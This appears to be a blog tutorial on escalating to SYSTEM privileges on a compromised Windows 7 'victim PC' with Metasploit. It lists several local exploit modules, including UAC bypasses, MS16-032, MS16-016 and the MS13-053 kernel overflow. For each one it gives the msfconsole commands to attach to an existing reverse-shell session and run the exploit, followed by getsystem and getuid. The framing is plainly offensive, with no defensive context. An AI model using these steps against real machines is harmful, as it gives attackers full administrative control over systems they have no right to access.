When you exploit the victim pc there would be
certain limits which resist performing some action even after you are having
the shell of victim’s pc. To get complete access of your victim pc; you need to
bypass privilege escalation where a
user receives privileges they are not authorize to. These privileges can be
used to delete files, view private information, or install unwanted programs
such as viruses. Metasploit has various other post exploits that will use a
number of different techniques to attempt to gain system level privileges on
the remote system.
Requirement
Attacker:
kali Linux
Victim
PC: Windows 7
Open kali Linux terminal type msfconsole
Use payload for windows and start multi/handler
for reverse connection. Once you hacked the victim pc now go for privilege
escalation using following techniques
Windows
Escalate UAC Protection Bypass
Available
targets: Windows
x32 and Windows x64 bit
This module will bypass Windows UAC by
utilizing the trusted publisher certificate through process injection. It will
spawn a second shell that has the UAC flag turned off.
msf > use
exploit/windows/local/bypassuac
msf exploit(bypassuac) > set session 1
msf exploit(bypassuac) > exploit
Give a look at image when you
will use getuid command it ask for
user ID that is username: pc10; after using getsystem now username is system. Again use getuid command now you are having admin access.
Windows Escalate UAC Protection Bypass (In Memory
Injection)
Available
targets: Windows
x32 and Windows x64 bit
This
module will bypass Windows UAC by utilizing the trusted publisher certificate
through process injection. It will spawn a second shell that has the UAC flag
turned off. This module uses the Reflective DLL Injection technique to drop
only the DLL payload binary instead of three separate binaries in the standard
technique. However, it requires the correct architecture to be selected, (use
x64 for SYSWOW64 systems also). If specifying EXE::Custom your DLL should call Exit
Process () after starting your payload in a separate process.
msf > use
exploit/windows/local/bypassuac_injection
msf exploit(bypassuac_injection)
> set session 1
msf exploit(bypassuac_injection)
> exploit
Use getsystem command and then go for user ID by typing getuid command in meterpreter.
Windows Escalate UAC Protection Bypass (Script Host
Vulnerability)
Available targets: Windows x32
and Windows x64 bit
This module will bypass Windows UAC by utilizing the
missing .manifest on the script host cscript/wscript.exe binaries.
msf > use
windows/local/bypassuac_vbs
msf exploit(bypassuac_vbs) > set session
1
msf exploit(bypassuac_vbs) > exploit
use
getsystem command and then go for
user ID by typing getuid command in
meterpreter.
Windows Escalate UAC Execute RunAs
Available targets: Windows x32 and Windows x64 bit
This module will attempt to elevate execution level
using the Shell Execute undocumented Run As flag to bypass low UAC settings.
Ask always uses a self-generated payload which is easily detected by AV. Click yes to allow the
payload to create another reverse shell with elevated privileges.
msf > use windows/local/ask
msf exploit(ask) > set session 1
msf exploit(ask) > exploit
Use getsystem command
and then go for user ID by typing getuid
command in meterpreter.
MS16-032 Secondary Logon Handle Privilege Escalation
Available targets: Windows x32 and Windows x64 bit
This
module exploits the lack of sanitization of standard handles in Windows'
Secondary Logon Service. The vulnerability is known to affect versions of
Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against
those versions of Windows with Powershell 2.0 or later and systems with two or
more CPU cores.
msf > use
windows/local/ms16_032_secondary_logon_handle_privesc
msf exploit(ms16_032_secondary_logon_handle_privesc)
> set session 1
msf exploit(ms16_032_secondary_logon_handle_privesc)
> exploit
Use getsystem command and then go for user ID by typing getuid command in meterpreter.
MS16-016 mrxdav.sys WebDav Local Privilege Escalation
Available targets:
Windows x32 bit
This
module exploits the vulnerability in mrxdav.sys described by MS16-016. The
module will spawn a process on the target system and elevate its privileges to
NT AUTHORITY\SYSTEM before executing the specified payload within the context
of the elevated process.
msf exploit(ms16_016_webdav) >set
session 1
msf exploit(ms16_016_webdav) > exploit
Use getsystem command in meterpreter for admin access of pc.
Windows NTUserMessageCall Win32k Kernel Pool Overflow
(Schlamperei)
Available targets: Windows 732 bit
This
module leverages a kernel pool overflow in Win32k which allows local privilege
escalation. The kernel shell code nulls the ACL for the winlogon.exe process (a
SYSTEM process). This allows any unprivileged process to freely migrate to
winlogon.exe, achieving privilege escalation. This exploit was used in pwn2own
2013 by MWR to break out of chrome's sandbox. NOTE: when a meterpreter session
started by this exploit exits, winlogin.exe is likely to crash.
msf exploit(ms13_053_schlamperei)
>set session 1
msf exploit(ms13_053_schlamperei)
>exploit
Use getsystem command and then go for user ID by typing getuid command in meterpreter.
0 comments:
Post a Comment